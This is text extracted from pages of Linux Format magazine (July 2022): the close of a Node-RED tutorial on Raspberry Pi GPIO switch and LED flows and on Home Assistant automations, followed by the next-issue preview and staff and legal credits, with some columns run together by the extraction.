Node is of the Switch type. Drag this Node to the canvas
and open the options. Leave Property set to msg.
payload and in the box below add the value of 1.
Next, drag the Counter node to the canvas. The
default setting should be fine. The final Node to drag to
the canvas is the green Debug node. Open the options
and change the Output box from msg.payload to msg.
count. Once all Nodes are added to the canvas and the
options set, they can be joined together. Drag from the
dot on the right-hand side of one Node to the left of
another and this joins the output of one to the input of
another. Join the Nodes together so that they resemble
the breadboard circuit diagram (page 96).
www.linuxformat.com
 NodeRED control CODING ACADEMY

Once the Flow has been built it needs to be deployed.

Select the Deploy button in the top-right corner of the
screen and follow any pop-ups that are shown. To test
all parts of the Flow, select the picture on the right-hand
side of the screen that resembles a small insect or bug.
This is the Debug panel and is where the counter
increment messages can be seen. Now, press the switch
and the LED will light. When the switch button is no
longer being pressed the LED will switch off. Also, for
each press of the button, a debug message will show,
which will show an incremented number each time.
Adding NodeRED to Home Assistant
Getting started with Home Assistant is easy and images
of the operating system, supervisor and project itself
are provided by the team and can be run on a Raspberry
Pi. To utilise NodeRED with Home Assistant, an Add-On
will need to be installed. Navigate to the Add-On store,
search for and install NodeRED, ensuring to set the
Start at boot, Watchdog and Auto-update options.
Start the Add-On and then move on to the
configuration, which will require a username and
password to be set in the http_node and http_static
stanzas. Once set, restart the Add-On and use the link
within the Add-Ons settings pages to open the interface.
Note that when using NodeRED from within Home
Assistant it’s not possible to access GPIO ports.
As well as what has already been described, entities
and services from Home Assistant can be referenced.
Within Home Assistant, entities are used to store the
values from hardware and software integrations from a
Here’s the breadboard circuit diagram accompanying the NodeRED
flow shown on the facing page.
wide range of local and cloud-based home automation This flow sends
systems/protocols. These entities can be referenced a notification
between the hours
from NodeRED to form the basis of any automation.
of 07:00 and 17:00,
When creating automations directly in Home when an entity
Assistant, one needs to consider three items. First is changes value.
the Trigger. For example, this could be the temperature
rising to a value above 20°C. The second item is
Conditions. These conditions determine whether
actions should run. For example, notifications of a rise
in temperature will only be required during waking
hours. The third item to consider is Actions. These Need a quick
can be used to send a Notification, set the value of a reference to the
Pi pins then the
Helper field or trigger another automation.
pinouts for the
These areas can also be recreated in NodeRED
Raspberry Pi
by using different Node types. The trigger can be can be seen at
implemented by using the Events:state node. Add this https://pinout.
to the canvas by dragging from the toolbox on to the xyz.
canvas. Double-click the Node and select which entity
from Home Assistant contains the relevant data. Within
this Node, options can also be set to control how a value
needs to be changed before a flow is triggered. Without
setting these extra options, the flow will be triggered on
any change of the entity.
Conditions can now be set by using a Time_range
node. Within the settings for this Node, select what the
criteria are for each output. Actions are added following
the outputs from the Time_range node. Finally, the Call_
service node is used to fire a service called Telegram
within the notify domain. The diagram (above) shows an
example of a Flow, where a Home Assistant entity is used
to trigger a Telegram notification. When a switch within
Home Assistant changes state from Off to On, two
notifications are sent to Telegram via a Home Assistant
service. Both notifications are triggered in parallel.
This is different to Home Assistant automations,
where parallel processing of actions would require
two separate automations to be configured.
NodeRED and Home Assistant automations can both
achieve the same results, but when more complicated
automation events are required NodeRED is probably
the more suitable option to go for.

BREAD BOARD AND SIMPLE ELECTRONIC COMPONENTS

We’re using the GPIO pins to interact
with the outside world, because a lot of
these pins can either be set up as input
or output. We’re using one as an input to
read the switch input and the other as
output to switch on and off the LED.
At the top and bottom of the
breadboard are red and blue lines. These
lines can be used to carry either 5V or
3.3V from the Raspberry Pi and the 0V
signal as well. In this article a positive
voltage of 3.3V is being used. Normally
we’d use the red line for a positive voltage
and a blue line for 0V.
Between the sets of horizontal lines
are a series of vertical lines, which are
used to build our circuit. The switch is
configured in a pull-down configuration.
When the switch isn’t pressed a value of
0V will be fed into the GPIO pin. When
pressed, 3.3V is fed into the GPIO pin.
The reason for using this configuration is
that if this resistor between the switch
and 0V was omitted the input would
“float” and the Raspberry Pi wouldn’t
know which value is being inputted and
would quickly fluctuate between the two.
The LED has two pins. The longer one is
for a positive voltage and the shorter one
for 0V. LED voltages vary, but a resistor
needs to be used so that the LED isn’t
destroyed by excess voltage. A 1K ohm
resistor for both purposes would suffice.

www.techradar.com/pro/linux July 2022 LXF290 97

NEXT MONTH

FAST VIRTUAL
The #1 open source mag

Future Publishing Limited,

Quay House, The Ambury, Bath, BA1 1UA

MACHINES
Email [email protected]
EDITORIAL
Editor Neil Mohr
Black-hoody editor Jonni Bidwell
Art editor Efrain Hernandez-Mendoza
Operations editor Cliff Hope
Group editor-in-chief Graham Barlow
Group art director Jo Gulliver
Editorial contributors
Michael Bedford, Neil Bothwick, Sean Conway, Dave
James, Matthew Hanson, Matthew Holder, Jon
Masters, Nick Peers, Aaron Peters, Les Pounder,

Virtual life makes everything Michael Reed, David Rutland, Mayank Sharma,
Shashank Sharma, Mihalis Tsoukalos
Cover illustration magictorch.com

repeatable and reproducible.

The “WordPress” word mark is a trademark of the WordPress
Foundation.
Raspberry Pi is a trademark of the Raspberry Pi Foundation.
Tux credit: Larry Ewing ([email protected]) and The GIMP.

So let’s clone our devices and ADVERTISING

Commercial sales director Clare Dove
[email protected]

live the virtual dream!

Senior advertising manager Lara Jaggon
[email protected]
Head of commercial – Technology Dave Randall
[email protected]
Account director Andrew Tilbury
[email protected]
INTERNATIONAL LICENSING
Head of Print Licensing Rachel Shaw
Linux Format is available for licensing and syndication.
To find our more contact us at [email protected]
or view our content at www.futurecontenthub.com.
NEW SUBSCRIPTIONS & BACK ISSUES
Web www.magazinesdirect.com
UK 0330 333 1113 World +44 (0) 330 333 1113
EXISTING SUBSCRIPTIONS
Web www.mymagazine.co.uk
UK 0330 333 4333 World +44 (0) 330 333 4333
Subscription delays: Disruption remains within UK
and International delivery networks. Please allow up to
7 days before contacting us about a late delivery to
[email protected]
CIRCULATION
Head of newstrade Tim Mathers
PRODUCTION AND DISTRIBUTION
Head of production UK & US Mark Constance
Production project manager Clare Scott
Senior ad production manager Jo Crosby
Digital editions controller Jason Hudson
THE MANAGEMENT
MD, tech specialist Keith Walker
Head of art and design Rodney Dive

LXF291
Design director Brett Lewis
Commercial finance director Dan Jotcham
Printed by Wyndeham Peterborough, Storey’s Bar
Road, Peterborough, Cambridgeshire, PE1 5YS
Distributed by Marketforce, 5 Churchill Place, Canary
will be on sale Wharf, London, E14 5HU www.marketforce.co.uk
Tel: 0203 787 9001
Tuesday Linux® is the registered trademark of Linus Torvalds in the U.S. and other countries.
GNU/Linux is abbreviated to Linux throughout for brevity. Where applicable code

28 June printed in this magazine is licensed under the GNU GPL v2 or later. See www.gnu.
org/copyleft/gpl.html. All copyrights and trademarks are recognised and respected.
Disclaimer All contents © 2022 Future Publishing Limited or published under
licence. All rights reserved. No part of this magazine may be used, stored,

2022 transmitted or reproduced in any way without the prior written permission of the
publisher. Future Publishing Limited (company number 2008885) is registered in
England and Wales. Registered office: Quay House, The Ambury, Bath BA1 1UA. All

Software KVM information contained in this publication is for information only and is, as far as we
are aware, correct at the time of going to press. Future cannot accept any
responsibility for errors or inaccuracies in such information. You are advised to
contact manufacturers and retailers directly with regard to the price of products/
services referred to in this publication. Apps and websites mentioned in this

Don’t build barriers. Instead, create a cross-platform, software-
based KVM for sharing keyboards and mice everywhere!
publication are not under our control. We are not responsible for their contents or any
other changes or updates to them. This magazine is fully independent and not
affiliated in any way with the companies mentioned herein.
If you submit material to us, you warrant that you own the material and/or have
the necessary rights/permissions to supply the material and you automatically grant
Future and its licensees a licence to publish your submission in whole or in part in
any/all issues and/or editions of publications, in any format published worldwide and
on associated websites, social media channels and associated products. Any
material you submit is sent at your own risk and, although every care is taken, neither
Future nor its employees, agents, subcontractors or licensees shall be liable for loss

Raspberry Pi OS face-off or damage. We assume all unsolicited material is for publication unless otherwise
stated, and reserve the right to edit, amend, adapt all submissions. All contents in
this magazine are used at your own risk. We accept no liability for any loss of data or
damage to your systems, peripherals or software through the use of any guide.
Notes: fear the Tux-knife of doom!

What should your Pi be running? We test a host of Pi distros
to see which is the most delicious filling for your Pi dish.
We are committed to only using magazine paper derived from
responsibly managed, certified forestry and chlorine-free
manufacture. The paper in this magazine was sourced and
produced from sustainable managed forests, conforming to
strict environmental and socioeconomic standards. The
manufacturing paper mill and printer hold full FSC and PEFC
certification and accreditation.

What’s with Web 3.0?
Discover how open source is at the heart of the next web
revolution and how blockchain technology is driving it all.
Future is an award-winning international media group and
leading digital business. We reach more than 57 million
international consumers a month and create world-class
content and advertising solutions for passionate
consumers online, on tablet & smartphone and in print.

Clone machine
We’re going clone mad down here at Linux Format Towers – now
we’re playing with Clonezilla for fast, easy system duplication. Future plc is a public
company quoted on the
London Stock Exchange
Chief executive Zillah Byng-Thorne
Non-executive chairman Richard Huntingford
!ǝǣƺǔˡȇƏȇƬǣƏǼȒǔˡƬƺȸ Penny Ladkin-Brand
(symbol: FUTR)
www.futureplc.com Tel +44 (0)1225 442244
Contents of future issues subject to change – there might be too much Steam Deck distraction going on!

98 LXF290 July 2022

9000 9001